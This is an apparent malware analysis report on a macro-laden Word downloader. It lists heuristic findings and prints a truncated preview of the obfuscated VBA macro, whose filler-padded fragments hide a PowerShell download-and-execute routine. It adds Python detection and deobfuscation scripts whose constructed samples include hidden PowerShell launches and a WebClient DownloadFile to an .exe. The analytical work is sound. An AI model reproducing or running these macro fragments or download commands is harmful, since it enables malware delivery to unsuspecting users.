Verdict: MALICIOUS (risk score 242)

Malware Insights

MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1566.001 Phishing: Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The macro combines a Shell() call with obfuscated string building: command fragments are cut out of filler-padded literals with Mid() and joined by concatenation, and once the repeated filler tokens are ignored the visible fragments read as parts of a PowerShell download-and-execute routine (a DownloadFile call, a new-object expression, a try/catch block, an .exe path). This is consistent with a downloader that assembles and launches a command to fetch a second-stage payload. The AutoOpen entry point together with the Shell() call strongly indicates malicious intent.
Heuristics (7)

- ClamAV: Doc.Macro.Obfuscation-6394109-0 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Macro.Obfuscation-6394109-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings). Document contains VBA macro code.
- Shell() call in VBA (critical, OLE_VBA_SHELL). The macro source contains a Shell() call, which hands a command line to the operating system.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN). The macro defines an AutoOpen procedure, so it runs as soon as the document is opened with macros enabled.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC). The compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This rule catches p-code-only documents and source-extraction failures, where no readable source is available; here it corroborates the source-level findings.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC). The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that this rule's text conflicts with the findings above: a VBA project was recovered (the extracted macros.bas), so the marker most likely fired on the same AutoOpen name and should be read as a duplicate of OLE_VBA_AUTOOPEN rather than as an independent signal.
- Embedded URL (info, EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace URI that ordinary Office documents carry and is not a network indicator; the macro's own download URL exists only as filler-padded fragments inside the Mid() literals and was therefore not extracted as a URL.
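The source-level signals in the list above (macro present, auto-exec entry point, Shell() call, execution tokens, string obfuscation) can be re-checked offline on the decoded VBA that olevba extracts. The following script is an added example and not the analyzer's own code: the rule names mirror the report, while the token lists, the obfuscation threshold, the verdict logic and the two VBA samples are this example's own assumptions. It works on readable source only, so it does not cover the p-code-only case that OLE_VBA_PCODE_AUTOEXEC_EXEC addresses.

```python
"""
Added example (not the analyzer's own code): reproduce the macro triage
signals from the heuristics list over VBA source text as olevba extracts
it. Rule names mirror the report; token lists, the obfuscation threshold,
the verdict logic and the two VBA samples are assumptions made here.
"""
import re
from dataclasses import dataclass
from typing import List

# Auto-execution entry points that run without any user action beyond
# enabling macros (the report's OLE_VBA_AUTOOPEN signal).
AUTOEXEC = re.compile(
    r"\b(?:Sub|Function)\s+(AutoOpen|AutoExec|AutoClose|Auto_Open|Auto_Close|"
    r"Document_Open|Document_Close|Workbook_Open|Workbook_Activate)\b",
    re.IGNORECASE,
)
SHELL_CALL = re.compile(r"\bShell\s*\(", re.IGNORECASE)
# Download / object-execution tokens (assumed list) that, next to an
# auto-exec entry point, point at a downloader rather than an office helper.
EXEC_TOKENS = re.compile(
    r"\b(?:CreateObject|WScript\.Shell|ShellExecute|URLDownloadToFile|"
    r"XMLHTTP|DownloadFile|DownloadString|Invoke-Item|powershell)\b",
    re.IGNORECASE,
)
MID_CALL = re.compile(r"\bMid\s*\(", re.IGNORECASE)
STR_CONCAT = re.compile(r'"\s*[+&]\s*"')   # "abc" + "def" style joins
OBFUSCATION_DENSITY = 0.4                    # assumed: (Mid + joins) per code line


@dataclass
class Finding:
    rule: str
    severity: str
    detail: str


def triage_vba(source: str) -> List[Finding]:
    """Return report-style findings for one extracted VBA module set."""
    findings: List[Finding] = []
    if source.strip():
        findings.append(Finding("OLE_VBA_MACROS", "medium", "Document contains VBA macro code"))
    auto = sorted(set(AUTOEXEC.findall(source)))
    if auto:
        findings.append(Finding("OLE_VBA_AUTOOPEN", "high", "auto-exec entry point: " + ", ".join(auto)))
    if SHELL_CALL.search(source):
        findings.append(Finding("OLE_VBA_SHELL", "critical", "Shell() call in VBA"))
    tokens = sorted({m.lower() for m in EXEC_TOKENS.findall(source)})
    if tokens:
        findings.append(Finding("VBA_EXEC_TOKENS", "high", "execution/download tokens: " + ", ".join(tokens)))
    # Obfuscation: how much of the code is Mid() slicing and literal joining.
    code_lines = [ln for ln in source.splitlines() if ln.strip()]
    joins = len(MID_CALL.findall(source)) + len(STR_CONCAT.findall(source))
    density = joins / max(len(code_lines), 1)
    if density >= OBFUSCATION_DENSITY:
        findings.append(Finding("OBFUSCATED_STRINGS", "high",
                                f"{joins} Mid()/concat operations over {len(code_lines)} code lines"))
    return findings


def verdict(findings: List[Finding]) -> str:
    """Auto-exec plus a way to run something is the combination the report calls malicious."""
    rules = {f.rule for f in findings}
    runs_code = bool(rules & {"OLE_VBA_SHELL", "VBA_EXEC_TOKENS"})
    if "OLE_VBA_AUTOOPEN" in rules and runs_code:
        return "malicious"
    if rules & {"OLE_VBA_AUTOOPEN", "OLE_VBA_SHELL", "VBA_EXEC_TOKENS", "OBFUSCATED_STRINGS"}:
        return "suspicious"
    return "low"


# Constructed samples (not taken from the analysed document).
MALICIOUS_SAMPLE = r'''
Attribute VB_Name = "NewMacros"
Sub AutoOpen()
    Dim p, q, r
    junk1 = Array("aB" + "cD" + "eF")
    p = Mid("xx--powershell -nop -w hidden--xx", 5, 25)
    q = " -c " + "Start-Process" + " calc.exe"
    r = Shell(p + q, vbHide)
End Sub
'''
BENIGN_SAMPLE = r'''
Sub FormatReport()
    ActiveDocument.Paragraphs(1).Range.Font.Bold = True
End Sub
'''

if __name__ == "__main__":
    for name, src in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        found = triage_vba(src)
        print(name, "->", verdict(found))
        for f in found:
            print(f"  {f.severity:8} {f.rule}: {f.detail}")
```

Run it on the real macros.bas by reading the file into `triage_vba`; the density threshold is deliberately low because downloader macros of this style consist almost entirely of Array()/Mid() lines, whereas legitimate automation rarely joins literals at all.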
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 50156 bytes | b3b082f538c10dcb27a912351a9df8f9b8d78c5d8e87a559db73e237d08654c1 |
Preview script: first 1,000 lines of the extracted script. The file holds two modules back to back (ThisDocument, whose attribute block comes first, then SXJzpjlQVKiOD). The AutoOpen procedure and the Shell() call reported in the heuristics lie past the point where the preview is cut off; every visible statement either fills a variable with Array() over concatenated junk literals or slices a filler-padded literal with Mid().

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "SXJzpjlQVKiOD"
Function FFVjzIwvtMPzG()
sippEWSB = Array("MpHmWDNmpnD" + "rCilAIR" + "cjQROzJsQzKC" + "fHUkiYMcCj" + "GFUwNdFMl")
kJLjDZ = Mid("2dBXgJr+gJrTm;9zXT'+'+zXTTzXT+zXT7zXT'+'+zXTbczXT+zXTd = WfDhttpzXTgJr+gJr+zXT:gJr+gJr//www.rentagJr+gJrlhtmamz'+'XT+zXTamia.czXT+zXTomzXT+zXT/nzXT+zXTPmD/zXT+zXT'+',zXT+wLpPPFS8wiBPEIbYJ2rE0WzXirO", 4, 167)
kBIjJnu = Array("uTIGzVtdW" + "hcRFSbZ" + "HofFfFBH" + "KrVvQqpWCJ" + "MwwOFVCh")
zRWcov = Array("zdZpYXtVVpcAkM" + "OARkEKZCBLIiNf" + "uwQajiuuKBTGh" + "mFVIBwcnchkZa" + "iPsjqhuijK")
TNPFrjhsFRc = Array("ZwnrNGjc" + "aBobcnJYnMsSn" + "FdKAVpEYj" + "TUzspDDozctI" + "LfNKzZlwtlfh")
EHarHcV = Mid("6HreazXT+zXTkzXT+zXT;}catch{write'+'-hzXT+zXTo'+'st 9T7_.EzXT+zXTxceptiozXT+zXTnzXT+zXT.MeszXT+zXTsagzXT+zXTe;zXT+zXT}'+'}zXT)-CrEPLACEg08ttwO6WNvIWilkUYShhc9Efi0adfnl", 3, 134)
CzScZncnrcN = Array("QUFHilDrKOF" + "WMjLHWjqGDWQu" + "mQzzIVKd" + "iWftwjhQJYcV" + "KWmHAUYMzp")
YkkOGOM = Array("CFOnpCUHI" + "pRjjIDTK" + "zwzVIfEwvk" + "iRKbAzaMnq" + "ZCXYtQpdsaaGk")
XNQbSWk = Array("DYbwGmWVwv" + "ijRMjwmz" + "CUvuTcAj" + "fCzdfEnwMqbwiG" + "GYlfoGKUVFRic")
zHObbVUvKQp = Mid("kaq9AVkS2KoT+zXgJr+gJrT6jnM4", 12, 12)
CwhtVmOlS = Array("DkGHkEZWi" + "XGHjKdGXiJ" + "wwjlnISszH" + "aIzNUECm" + "DUzAmIGSP")
IwiNavc = Array("dilmWRsHBDNZ" + "mvVLTOEnuqUu" + "UiiXOVKRjMpLM" + "wwXhSPYXYzuzU" + "tinRsdwKdd")
jzNcl = Array("ZqarBLI" + "XiSTdRcdMbUL" + "ZHVTptIGarlW" + "SjaQUiKNTLwli" + "njvYhnSA")
rbIod = Mid("icaYoDjU2264cotinsPJqXPK62iYcb2JwDJr+gJrT7envzXT+zXT:publiczXT+zXT +zXT+'+'zXT WfzXT+zXTDczXT+zgJr+gJrXTwYWfD + 9zXT+zXTTzXT+zXT7karapazXjH", 35, 103)
DwKfVro = Array("sOQCjjAGaGoWJ" + "fUzJicQ" + "nYBYXTj" + "nVtraBIVpTuqu" + "ELiPMIzBw")
oZpjjNtJp = Array("FYLRzawqjzjz" + "DwHqBUGvWiGhV" + "fTEjaSzVsI" + "KmWVRowN" + "fzRrmztoipEkiD")
ZJMVQPfAiwO = Array("CMlTORfJj" + "BuAJzfbPUSnbtl" + "zBOOvJHGMiVS" + "aJJWRCsXNmP" + "nNaicbTAjPP")
TQIHp = Mid("Ujfnmvln9z67vTent;9T7zXT+zXTgJ'+'r+gJrnsadasdzXT+zXT = zXT+zXTnew-ozXT+zXTbjzXT+zXTeczXT+gJr+gJrzXTt rgJr+gJrandozXT+zgJr+gJraYlvWFtvCl", 14, 112)
ZjGioKDzikV = Array("WcNJhtiEw" + "qikZFuITbrj" + "NwdYKmC" + "cjiEwpa" + "jAzuSNvPJOduw")
hlPWZzKfj = Array("unluoofiM" + "oLIQJrtMmOzjIv" + "ckCCSuLtsciQ" + "jYGkRqYPWLRbGX" + "BSKipNMEcbu")
ndljQBvaYB = Array("vGfrBiiva" + "XfAKFtiFvcbUz" + "wZzcSzV" + "mIoRpmHoKz" + "PwGABpWOwz")
oOXKYKzIfYn = Mid("UIK6zmADaDFSoKpIIQa7DUkfoZNzXT9T7gJr+gJrzXT+zXTbcd)zXT+gJr+gJrzXT{tzX'+'T+zXTry{9T7frgJr+gJrzX'+'T+zXTanc.DownloadFzXT+zgJr+gJrXTilezXT+zXT(9zXT+zgJr+'+'gJr'+'XTT7abzXT+zXTcz'+'XT+zXT.ToSzXT+zXTtzXT+zXTring(),zXT+zXT 9TRvvwmw2F", 28, 192)
LoaTPK = Array("dSQofav" + "NIOSRXRFYla" + "XisZRzak" + "UiJXpvzGWm" + "LuPsEsN")
jJlUjEzXRrq = Array("qaGdtbiBcaUw" + "rVoErzGRbzkDr" + "wnwkWbBROL" + "tjFIXwvz" + "JjBRXBqSP")
RPDUbwuQwv = Array("cBdcmJYWn" + "GofPNvq" + "JjtOFokvYrJ" + "QVoDSpcV" + "MKCkTSvKuzfru")
nISwRd = Mid("UQzwHGYlAnRizskEqMkrvr2FnNHiz'+'XT+zXT7o2P5", 29, 11)
lCfZqTvaS = Array("WZBDkOjqzXr" + "HcswRAJEBoD" + "PSmiNVliCkp" + "scVurFwcViYY" + "YkpJKbhVWn")
GofwciFqiiT = Array("GZNwprrkj" + "fpkzcwXTU" + "wWqdlVokiudQ" + "IidEtniwbd" + "EiiwizZMWJQki")
bkcHZO = Array("ZuNNuzA" + "jvhNRbYlMpvFOI" + "mRnvbmTEULh" + "BSTcwrkbJzw" + "wrhJRoOoQQav")
jwlDbTm = Mid("zjJKs + WfD.zXT+zXTexeWzXT+zXTfD;forez'+'XT+zXTach(9T7aEi1AzvLtUIjsK", 5, 51)
ktiGwAEiXk = Array("LTCGGlkPTcRw" + "djpmUsBYGnsCj" + "RtMrzvTiTb" + "VsEpLFfkEwfhW" + "rjLEjKEZQSWHkT")
OhFci = Array("DYKQqMCj" + "XTsNzNijUnUAzk" + "JmfwtOl" + "XVtTZLSmuDCUO" + "DpAKkvmaG")
XhfrIpnvh = Array("YPOUqIGC" + "WYcRPlQnvllYjE" + "XFqiOwSwHdGDpt" + "jFTmPXiTq" + "zFqPXlrLSz")
rRihwrlLck = Mid("ul8tHMjr6Ys6tH84LhzXT+zXTuazXT+zXTs);IzXT+zXTnzXgJr+gJrT+zXTvogJr+gJrke-ItezXTgJr+gJr+zXTmzXT+zXT(9T7h'+'zXT+Xv5aIQczjji9DIrJM
```

... (truncated)
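The Mid()-over-filler idiom in the preview can be evaluated statically, which recovers the hidden command fragments without ever running the macro. The script below is an added example and not the analyzer's or the malware author's code: it tokenizes each `name = <expression>` line, evaluates Mid(), Chr(), StrReverse(), Replace() and "+"/"&" joins with VBA semantics (1-based Mid, single-element Array() flattened to its string), and then strips filler tokens. The VBA sample, the decoded command and the two filler tokens are constructed for this demo; which tokens the real sample removes has to be read from its own Replace/-replace logic, which lies beyond the truncated preview.

```python
"""
Added example (not the analyzer's own code): statically evaluate the
Mid()/"+" string-building idiom seen in the extracted macro so the hidden
command fragments can be read without executing anything. The VBA sample,
the decoded command and the filler tokens are constructed assumptions.
"""
import re
from typing import Dict, List

# Tokenizer for the expression subset string-building macros use:
# string literals ("" escapes a quote), integers, identifiers, punctuation.
TOKEN = re.compile(r'\s*(?:("(?:[^"]|"")*")|(\d+)|([A-Za-z_]\w*)|([()+&,]))')
ASSIGN = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$')


def tokenize(src: str):
    pos, out, src = 0, [], src.strip()
    while pos < len(src):
        m = TOKEN.match(src, pos)
        if not m:
            raise ValueError(f"cannot tokenize {src[pos:pos + 12]!r}")
        pos = m.end()
        s, n, ident, punct = m.groups()
        if s is not None:
            out.append(("str", s[1:-1].replace('""', '"')))
        elif n is not None:
            out.append(("num", int(n)))
        elif ident is not None:
            out.append(("id", ident))
        else:
            out.append(("op", punct))
    return out


class Evaluator:
    """Recursive-descent evaluator: expr := term (('+'|'&') term)*."""

    def __init__(self, tokens, env: Dict[str, str]):
        self.toks, self.i, self.env = tokens, 0, env

    def peek(self):
        return self.toks[self.i] if self.i < len(self.toks) else ("eof", None)

    def expect(self, kind, val):
        if self.peek() != (kind, val):
            raise ValueError(f"expected {val!r}, got {self.peek()}")
        self.i += 1

    def expr(self):
        val = self.term()
        while self.peek() in (("op", "+"), ("op", "&")):
            self.i += 1
            val = str(val) + str(self.term())   # + and & both join strings here
        return val

    def term(self):
        kind, val = self.peek()
        self.i += 1
        if kind in ("str", "num"):
            return val
        if kind == "id":
            if self.peek() == ("op", "("):     # function call with argument list
                self.i += 1
                args = []
                if self.peek() != ("op", ")"):
                    args.append(self.expr())
                    while self.peek() == ("op", ","):
                        self.i += 1
                        args.append(self.expr())
                self.expect("op", ")")
                return self.call(val, args)
            if val in self.env:                # variable assigned earlier in the module
                return self.env[val]
            raise ValueError(f"unknown variable {val}")
        raise ValueError(f"unexpected token {kind} {val!r}")

    def call(self, name: str, args: list):
        fn = name.lower()
        if fn == "mid":                        # Mid(s, start[, len]) is 1-based
            s, start = str(args[0]), int(args[1])
            length = int(args[2]) if len(args) > 2 else len(s)
            return s[start - 1:start - 1 + length]
        if fn == "array":                      # single-element Array() used as filler holder
            return "".join(str(a) for a in args)
        if fn == "chr":
            return chr(int(args[0]))
        if fn == "strreverse":
            return str(args[0])[::-1]
        if fn == "replace":
            return str(args[0]).replace(str(args[1]), str(args[2]))
        raise ValueError(f"unsupported function {name}")


def evaluate_assignments(src: str) -> Dict[str, str]:
    """Walk the module top to bottom, resolving every `name = <string expr>` it can."""
    env: Dict[str, str] = {}
    for line in src.splitlines():
        m = ASSIGN.match(line)
        if not m:
            continue
        try:
            ev = Evaluator(tokenize(m.group(2)), env)
            value = ev.expr()
            if ev.peek()[0] == "eof":
                env[m.group(1)] = str(value)
        except ValueError:
            continue                           # not a pure string expression; skip it
    return env


def strip_filler(value: str, filler: List[str]) -> str:
    for token in filler:
        value = value.replace(token, "")
    return value


def recover_strings(src: str, filler: List[str]) -> Dict[str, str]:
    return {k: strip_filler(v, filler) for k, v in evaluate_assignments(src).items()}


# Constructed sample in the shape of the preview: filler-padded Mid() slices
# and junk Array() lines joined into one command. Filler tokens are assumed.
FILLER = ["zXT+zXT", "gJr+gJr"]
SAMPLE = r'''
Function Build()
junk1 = Array("MpHm" + "WDNm" + "pnDr")
a = Mid("q3!p$w = new-ozXT+zXTbject NgJr+gJret.WebCzXT+zXTlient@@", 5, 50)
b = Chr(59) + " $w.DownloadFzXT+zXTile("
c = Mid("xx'http://exzXT+zXTample.invalid/p'88", 3, 33)
d = ", $env:pubgJr+gJrlic + '\p.exe')"
Build = a + b + c + d
End Function
'''

if __name__ == "__main__":
    for name, value in recover_strings(SAMPLE, FILLER).items():
        print(f"{name} = {value!r}")
```

Feed the real macros.bas to `recover_strings` with an empty filler list first and look at the longest recovered values: the repeated separators stand out immediately, and only then should they go into the filler list, so that the stripping step reflects what the macro itself removes rather than a guess.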